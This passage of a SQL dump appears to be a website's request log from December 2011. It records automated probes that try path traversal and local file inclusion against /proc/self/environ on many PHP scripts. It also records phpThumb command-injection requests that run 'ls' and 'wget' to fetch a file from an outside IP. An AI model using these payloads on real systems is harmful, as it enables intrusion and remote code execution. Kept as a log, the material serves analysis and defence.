00:00:00'),(345,'http://www.i24.pl/blend_data/blend_common.php?phpbb_ro','','','',0,'2011-12-21 08:20:47','0000-00-00 00:00:00'),(346,'http://www.i24.pl/master.php?root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:48','0000-00-00 00:00:00'),(347,'http://www.i24.pl/includes/kb_constants.php?module_r','','','',0,'2011-12-21 08:20:48','0000-00-00 00:00:00'),(348,'http://www.i24.pl/forum/includes/kb_constants.php?module_r','','','',0,'2011-12-21 08:20:49','0000-00-00 00:00:00'),(349,'http://www.i24.pl/forums/includes/kb_constants.php?module_r','','','',0,'2011-12-21 08:20:53','0000-00-00 00:00:00'),(350,'http://www.i24.pl/classes/adodbt/sql.php?classes_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:54','0000-00-00 00:00:00'),(351,'http://www.i24.pl/sources/lostpw.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:57','0000-00-00 00:00:00'),(352,'http://www.i24.pl/topsites/sources/lostpw.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:01','0000-00-00 00:00:00'),(353,'http://www.i24.pl/toplist/sources/lostpw.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:05','0000-00-00 00:00:00'),(354,'http://www.i24.pl/sources/join.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:09','0000-00-00 00:00:00'),(355,'http://www.i24.pl/topsites/sources/join.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:12','0000-00-00 00:00:00'),(356,'http://www.i24.pl/toplist/sources/join.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:16','0000-00-00 00:00:00'),(357,'http://www.i24.pl/topsite/sources/join.php?CONFIG[path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:18','0000-00-00 00:00:00'),(358,'http://www.i24.pl/public_includes/pub_popup/popup_finduser.php?vsDrag','','','',0,'2011-12-21 08:21:19','0000-00-00 00:00:00'),(359,'http://www.i24.pl/extras/poll/poll.php?file_newsportal=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:20','0000-00-00 00:00:00'),(360,'http://www.i24.pl/mail/index.php?site_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:21','0000-00-00 00:00:00'),(361,'http://www.i24.pl/fclick/show.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:22','0000-00-00 00:00:00'),(362,'http://www.i24.pl/show.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:24','0000-00-00 00:00:00'),(363,'http://www.i24.pl/eshow.php?Config_rootdir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:29','0000-00-00 00:00:00'),(364,'http://www.i24.pl/auction/auction_common.php?phpbb_','','','',0,'2011-12-21 08:21:30','0000-00-00 00:00:00'),(365,'http://www.i24.pl/calendar/index.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:35','0000-00-00 00:00:00'),(366,'http://www.i24.pl/modules/TotalCalendar/index.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:35','0000-00-00 00:00:00'),(367,'http://www.i24.pl/modules/calendar/index.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:36','0000-00-00 00:00:00'),(368,'http://www.i24.pl/calendar/embed/day.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:45','0000-00-00 00:00:00'),(369,'http://www.i24.pl/ACalendar/embed/day.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:47','0000-00-00 00:00:00'),(370,'http://www.i24.pl/calendar/add_event.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:50','0000-00-00 00:00:00'),(371,'http://www.i24.pl/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRep','','','',0,'2011-12-21 08:21:51','0000-00-00 00:00:00'),(372,'http://www.i24.pl/claroline/auth/ldap/authldap.php?includePath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:52','0000-00-00 00:00:00'),(373,'http://www.i24.pl/docebo/modules/credits/help.php?lang=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:54','0000-00-00 00:00:00'),(374,'http://www.i24.pl/modules/credits/help.php?lang=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:21:56','0000-00-00 00:00:00'),(375,'http://www.i24.pl/config.php?returnpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:02','0000-00-00 00:00:00'),(376,'http://www.i24.pl/editsite.php?returnpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:03','0000-00-00 00:00:00'),(377,'http://www.i24.pl/in.php?returnpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:03','0000-00-00 00:00:00'),(378,'http://www.i24.pl/addsite.php?returnpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:04','0000-00-00 00:00:00'),(379,'http://www.i24.pl/includes/pafiledb_constants.php?mo','','','',0,'2011-12-21 08:22:06','0000-00-00 00:00:00'),(380,'http://www.i24.pl/phpBB/includes/pafiledb_constants.php?mo','','','',0,'2011-12-21 08:22:07','0000-00-00 00:00:00'),(381,'http://www.i24.pl/pafiledb/includes/pafiledb_constants.php?mo','','','',0,'2011-12-21 08:22:08','0000-00-00 00:00:00'),(382,'http://www.i24.pl/auth/auth.php?phpbb_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:10','0000-00-00 00:00:00'),(383,'http://www.i24.pl/infusions/last_seen_users_panel/last_seen_users_panel.php','','','',0,'2011-12-21 08:22:12','0000-00-00 00:00:00'),(384,'http://www.i24.pl/phpdig/includes/config.php?relative_scrip','','','',0,'2011-12-21 08:22:15','0000-00-00 00:00:00'),(385,'http://www.i24.pl/includes/phpdig/includes/config.php?relative_scrip','','','',0,'2011-12-21 08:22:15','0000-00-00 00:00:00'),(386,'http://www.i24.pl/includes/dbal.php?eqdkp_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:16','0000-00-00 00:00:00'),(387,'http://www.i24.pl/eqdkp/includes/dbal.php?eqdkp_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:17','0000-00-00 00:00:00'),(388,'http://www.i24.pl/dkp/includes/dbal.php?eqdkp_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:18','0000-00-00 00:00:00'),(389,'http://www.i24.pl/path/include/SQuery/gameSpy2.php?libpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:18','0000-00-00 00:00:00'),(390,'http://www.i24.pl/topsites/config.php?returnpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:21','0000-00-00 00:00:00'),(391,'http://www.i24.pl/manager/frontinc/prepend.php?_PX_config[manager_path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:22','0000-00-00 00:00:00'),(392,'http://www.i24.pl/ubbthreads/addpost_newpoll.php?addpo','','','',0,'2011-12-21 08:22:23','0000-00-00 00:00:00'),(393,'http://www.i24.pl/forum/addpost_newpoll.php?thisp','','','',0,'2011-12-21 08:22:23','0000-00-00 00:00:00'),(394,'http://www.i24.pl/forums/addpost_newpoll.php?thisp','','','',0,'2011-12-21 08:22:27','0000-00-00 00:00:00'),(395,'http://www.i24.pl/ubbthreads/ubbt.inc.php?thispath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:31','0000-00-00 00:00:00'),(396,'http://www.i24.pl/forums/ubbt.inc.php?thispath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:32','0000-00-00 00:00:00'),(397,'http://www.i24.pl/forum/ubbt.inc.php?thispath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:32','0000-00-00 00:00:00'),(398,'http://www.i24.pl/forum/admin/addentry.php?phpbb_root_p','','','',0,'2011-12-21 08:22:33','0000-00-00 00:00:00'),(399,'http://www.i24.pl/admin/addentry.php?phpbb_root_p','','','',0,'2011-12-21 08:22:34','0000-00-00 00:00:00'),(400,'http://www.i24.pl/ipchat.php?root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:37','0000-00-00 00:00:00'),(401,'http://www.i24.pl/includes/orderSuccess.inc.php?glob[rootDir]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:38','0000-00-00 00:00:00'),(402,'http://www.i24.pl/stats.php?dir[func]=dir[base]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:38','0000-00-00 00:00:00'),(403,'http://www.i24.pl/ladder/stats.php?dir[base]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:39','0000-00-00 00:00:00'),(404,'http://www.i24.pl/ladders/stats.php?dir[base]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:40','0000-00-00 00:00:00'),(405,'http://www.i24.pl/sphider/admin/configset.php?settings_di','','','',0,'2011-12-21 08:22:44','0000-00-00 00:00:00'),(406,'http://www.i24.pl/admin/configset.php?settings_di','','','',0,'2011-12-21 08:22:46','0000-00-00 00:00:00'),(407,'http://www.i24.pl/vwar/admin/admin.php?vwar_root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:47','0000-00-00 00:00:00'),(408,'http://www.i24.pl/modules/vwar/admin/admin.php?vwar_root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:49','0000-00-00 00:00:00'),(409,'http://www.i24.pl/modules/vWar_Account/includes/get_header.php?vwar_root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:22:50','0000-00-00 00:00:00'),(410,'http://www.i24.pl/modules/vWar_Account/includes/functions_common.php?vwar','','','',0,'2011-12-21 08:22:55','0000-00-00 00:00:00'),(411,'http://www.i24.pl/impex/ImpExData.php?systempath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:01','0000-00-00 00:00:00'),(412,'http://www.i24.pl/forum/impex/ImpExData.php?systempath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:03','0000-00-00 00:00:00'),(413,'http://www.i24.pl/forums/impex/ImpExData.php?systempath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:05','0000-00-00 00:00:00'),(414,'http://www.i24.pl/application.php?base_path','','','',0,'2011-12-21 08:23:05','0000-00-00 00:00:00'),(415,'http://www.i24.pl/become_editor.php?theme_p','','','',0,'2011-12-21 08:23:11','0000-00-00 00:00:00'),(416,'http://www.i24.pl/add.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:12','0000-00-00 00:00:00'),(417,'http://www.i24.pl/bad_link.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:13','0000-00-00 00:00:00'),(418,'http://www.i24.pl/browse.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:13','0000-00-00 00:00:00'),(419,'http://www.i24.pl/detail.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:14','0000-00-00 00:00:00'),(420,'http://www.i24.pl/fav.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:15','0000-00-00 00:00:00'),(421,'http://www.i24.pl/get_rated.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:18','0000-00-00 00:00:00'),(422,'http://www.i24.pl/login.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:20','0000-00-00 00:00:00'),(423,'http://www.i24.pl/mailing_list.php?theme_pa','','','',0,'2011-12-21 08:23:23','0000-00-00 00:00:00'),(424,'http://www.i24.pl/new.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:23','0000-00-00 00:00:00'),(425,'http://www.i24.pl/modify.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:24','0000-00-00 00:00:00'),(426,'http://www.i24.pl/pick.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:26','0000-00-00 00:00:00'),(427,'http://www.i24.pl/power_search.php?theme_pa','','','',0,'2011-12-21 08:23:27','0000-00-00 00:00:00'),(428,'http://www.i24.pl/rating.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:28','0000-00-00 00:00:00'),(429,'http://www.i24.pl/register.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:28','0000-00-00 00:00:00'),(430,'http://www.i24.pl/review.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:30','0000-00-00 00:00:00'),(431,'http://www.i24.pl/rss.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:31','0000-00-00 00:00:00'),(432,'http://www.i24.pl/search.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:35','0000-00-00 00:00:00'),(433,'http://www.i24.pl/send_pwd.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:35','0000-00-00 00:00:00'),(434,'http://www.i24.pl/sendmail.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:39','0000-00-00 00:00:00'),(435,'http://www.i24.pl/tell_friend.php?theme_pat','','','',0,'2011-12-21 08:23:44','0000-00-00 00:00:00'),(436,'http://www.i24.pl/top_rated.php?theme_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:52','0000-00-00 00:00:00'),(437,'http://www.i24.pl/user_detail.php?theme_pat','','','',0,'2011-12-21 08:23:55','0000-00-00 00:00:00'),(438,'http://www.i24.pl/user_search.php?theme_pat','','','',0,'2011-12-21 08:23:58','0000-00-00 00:00:00'),(439,'http://www.i24.pl/invoice.php?base_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:23:59','0000-00-00 00:00:00'),(440,'http://www.i24.pl/includes/class_template.php?quezza','','','',0,'2011-12-21 08:24:09','0000-00-00 00:00:00'),(441,'http://www.i24.pl/bazar/classified_right.php?lang','','','',0,'2011-12-21 08:24:10','0000-00-00 00:00:00'),(442,'http://www.i24.pl/classified_right.php?lang','','','',0,'2011-12-21 08:24:15','0000-00-00 00:00:00'),(443,'http://www.i24.pl/phpBazar/classified_right.php?lang','','','',0,'2011-12-21 08:24:18','0000-00-00 00:00:00'),(444,'http://www.i24.pl/bbs/include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:21','0000-00-00 00:00:00'),(445,'http://www.i24.pl/visitorupload.php?cmd=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:22','0000-00-00 00:00:00'),(446,'http://www.i24.pl/modules/center/admin/accounts/process.php?module_path]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:23','0000-00-00 00:00:00'),(447,'http://www.i24.pl/armygame.php?libpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:32','0000-00-00 00:00:00'),(448,'http://www.i24.pl/lire.php?rub=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:32','0000-00-00 00:00:00'),(449,'http://www.i24.pl/pathofhostadmin/?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:33','0000-00-00 00:00:00'),(450,'http://www.i24.pl/apa_phpinclude.inc.php?ap','','','',0,'2011-12-21 08:24:35','0000-00-00 00:00:00'),(451,'http://www.i24.pl/research/boards/encapsbb-0.3.2_fixed/index_header.php?root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:39','0000-00-00 00:00:00'),(452,'http://www.i24.pl/Farsi1/index.php?archive=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:40','0000-00-00 00:00:00'),(453,'http://www.i24.pl/show_archives.php?templat','','','',0,'2011-12-21 08:24:43','0000-00-00 00:00:00'),(454,'http://www.i24.pl/forum/include/common.php?pun_root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:44','0000-00-00 00:00:00'),(455,'http://www.i24.pl/vuln.php?=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:48','0000-00-00 00:00:00'),(456,'http://www.i24.pl/admin/common.inc.php?basepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:50','0000-00-00 00:00:00'),(457,'http://www.i24.pl/pm/lib.inc.php?sfx=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:24:57','0000-00-00 00:00:00'),(458,'http://www.i24.pl/artmedic-kleinanzeigen-path/index.php?id=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:03','0000-00-00 00:00:00'),(459,'http://www.i24.pl/osticket/include/main.php?include_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:06','0000-00-00 00:00:00'),(460,'http://www.i24.pl/include/main.php?config[search_disp]=include_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:07','0000-00-00 00:00:00'),(461,'http://www.i24.pl/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:07','0000-00-00 00:00:00'),(462,'http://www.i24.pl/quick_reply.php?phpbb_roo','','','',0,'2011-12-21 08:25:10','0000-00-00 00:00:00'),(463,'http://www.i24.pl/zboard/include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:12','0000-00-00 00:00:00'),(464,'http://www.i24.pl/admin/plog-admin-functions.php?configbased','','','',0,'2011-12-21 08:25:13','0000-00-00 00:00:00'),(465,'http://www.i24.pl/phpgreetz/content.php?content=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:13','0000-00-00 00:00:00'),(466,'http://www.i24.pl/qnews/q-news.php?id=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:18','0000-00-00 00:00:00'),(467,'http://www.i24.pl/ews/q-news.php?id=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:19','0000-00-00 00:00:00'),(468,'http://www.i24.pl/_conf/core/common-tpl-vars.php?confdir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:23','0000-00-00 00:00:00'),(469,'http://www.i24.pl/votebox.php?VoteBoxPath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:25','0000-00-00 00:00:00'),(470,'http://www.i24.pl/al_initialize.php?alpath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:30','0000-00-00 00:00:00'),(471,'http://www.i24.pl/protection.php?siteurl=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:32','0000-00-00 00:00:00'),(472,'http://www.i24.pl/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:36','0000-00-00 00:00:00'),(473,'http://www.i24.pl/classes.php?LOCAL_PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:39','0000-00-00 00:00:00'),(474,'http://www.i24.pl/extensions/moblog/moblog_lib.php?basedir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:42','0000-00-00 00:00:00'),(475,'http://www.i24.pl/modules/newbb_plus/class/forumpollrenderer.php?bbP','','','',0,'2011-12-21 08:25:45','0000-00-00 00:00:00'),(476,'http://www.i24.pl/phpWebLog/include/init.inc.php?G_PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:47','0000-00-00 00:00:00'),(477,'http://www.i24.pl/trg_news30/trgnews/install/article.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:48','0000-00-00 00:00:00'),(478,'http://www.i24.pl/block.php?Include=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:50','0000-00-00 00:00:00'),(479,'http://www.i24.pl/arpuivo.php?data=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:52','0000-00-00 00:00:00'),(480,'http://www.i24.pl/gallery/setup/index.php?GALLERY_BASEDIR','','','',0,'2011-12-21 08:25:54','0000-00-00 00:00:00'),(481,'http://www.i24.pl/include/help.php?base=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:55','0000-00-00 00:00:00'),(482,'http://www.i24.pl//block.php?Include=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:25:59','0000-00-00 00:00:00'),(483,'http://www.i24.pl/phonebook.php?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:00','0000-00-00 00:00:00'),(484,'http://www.i24.pl/PHPNews/auth.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:00','0000-00-00 00:00:00'),(485,'http://www.i24.pl/include/print_category.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:04','0000-00-00 00:00:00'),(486,'http://www.i24.pl/skin/zero_vote/login.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:05','0000-00-00 00:00:00'),(487,'http://www.i24.pl/skin/zero_vote/setup.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:07','0000-00-00 00:00:00'),(488,'http://www.i24.pl/skin/zero_vote/ask_password.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:08','0000-00-00 00:00:00'),(489,'http://www.i24.pl/gui/include/sql.php?include_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:09','0000-00-00 00:00:00'),(490,'http://www.i24.pl/webmail/lib/emailreader_execute_on_ea','','','',0,'2011-12-21 08:26:13','0000-00-00 00:00:00'),(491,'http://www.i24.pl/email.php?login=cer_skin=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:17','0000-00-00 00:00:00'),(492,'http://www.i24.pl/PhotoGal/ops/gals.php?news_file=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:18','0000-00-00 00:00:00'),(493,'http://www.i24.pl/loginout.php?cutepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:21','0000-00-00 00:00:00'),(494,'http://www.i24.pl/oneadmin/config.php?path[docroot]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:23','0000-00-00 00:00:00'),(495,'http://www.i24.pl/xcomic/initialize.php?xcomicRoot','','','',0,'2011-12-21 08:26:27','0000-00-00 00:00:00'),(496,'http://www.i24.pl/admin_modules/admin_module_edit.inc.php','','','',0,'2011-12-21 08:26:39','0000-00-00 00:00:00'),(497,'http://www.i24.pl/src/index_overview.inc.php?co','','','',0,'2011-12-21 08:26:43','0000-00-00 00:00:00'),(498,'http://www.i24.pl/src/index_leftnavbar.inc.php','','','',0,'2011-12-21 08:26:45','0000-00-00 00:00:00'),(499,'http://www.i24.pl/src/index_image.inc.php?confi','','','',0,'2011-12-21 08:26:46','0000-00-00 00:00:00'),(500,'http://www.i24.pl/src/image-gd.class.php?config[path_src_include]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:48','0000-00-00 00:00:00'),(501,'http://www.i24.pl/src/image.class.php?config[path_src_include]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:52','0000-00-00 00:00:00'),(502,'http://www.i24.pl/src/album.class.php?config[path_src_include]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:54','0000-00-00 00:00:00'),(503,'http://www.i24.pl/src/show_random.inc.php?confi','','','',0,'2011-12-21 08:26:56','0000-00-00 00:00:00'),(504,'http://www.i24.pl/src/main.inc.php?config[path_src_include]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:26:57','0000-00-00 00:00:00'),(505,'http://www.i24.pl/src/index_passwd-admin.inc.php?config[path_admin_include]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:27:01','0000-00-00 00:00:00'),(506,'http://www.i24.pl/cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; l','','','',0,'2011-12-22 16:50:48','0000-00-00 00:00:00'),(507,'http://www.i24.pl/wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ','','','',0,'2011-12-22 16:50:48','0000-00-00 00:00:00'),(508,'http://www.i24.pl/common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wge','','','',0,'2011-12-22 16:50:49','0000-00-00 00:00:00'),(509,'http://www.i24.pl/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.','','','',0,'2011-12-22 16:50:49','0000-00-00 00:00:00'),(510,'http://www.i24.pl/libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/','','','',0,'2011-12-22 16:50:51','0000-00-00 00:00:00'),(511,'http://www.i24.pl/wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jp','','','',0,'2011-12-22 16:50:52','0000-00-00 00:00:00'),(512,'http://www.i24.pl/wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ','','','',0,'2011-12-22 16:50:52','0000-00-00 00:00:00'),(513,'http://www.i24.pl/gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /t','','','',0,'2011-12-22 16:50:53','0000-00-00 00:00:00'),(514,'http://www.i24.pl/wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls ','','','',0,'2011-12-22 16:50:53','0000-00-00 00:00:00'),(515,'http://www.i24.pl/wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg','','','',0,'2011-12-22 16:50:55','0000-00-00 00:00:00'),(516,'http://www.i24.pl/wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail','','','',0,'2011-12-22 16:50:56','0000-00-00 00:00:00'),(517,'http://www.i24.pl/wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fai','','','',0,'2011-12-22 16:50:57','0000-00-00 00:00:00'),(518,'http://www.i24.pl/js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fai','','','',0,'2011-12-22 16:51:00','0000-00-00 00:00:00'),(519,'http://www.i24.pl/mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -in','','','',0,'2011-12-22 16:51:00','0000-00-00 00:00:00'),(520,'http://www.i24.pl/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -inte','','','',0,'2011-12-22 16:51:01','0000-00-00 00:00:00'),(521,'http://www.i24.pl/modules/phpThumb/phpThumb.php?src=phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -','','','',0,'2011-12-22 16:51:01','0000-00-00 00:00:00'),(522,'http://www.i24.pl/lib/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f','','','',0,'2011-12-22 16:51:05','0000-00-00 00:00:00'),(523,'http://www.i24.pl/manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /t','','','',0,'2011-12-22 16:51:08','0000-00-00 00:00:00'),(524,'http://www.i24.pl/thumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.','','','',0,'2011-12-22 16:51:08','0000-00-00 00:00:00'),(525,'http://www.i24.pl/global/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tm','','','',0,'2011-12-22 16:51:09','0000-00-00 00:00:00'),(526,'http://www.i24.pl/components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -','','','',0,'2011-12-22 16:51:09','0000-00-00 00:00:00'),(527,'http://www.i24.pl/wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ;','','','',0,'2011-12-22 16:51:13','0000-00-00 00:00:00'),(528,'http://www.i24.pl/staticfiles/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l 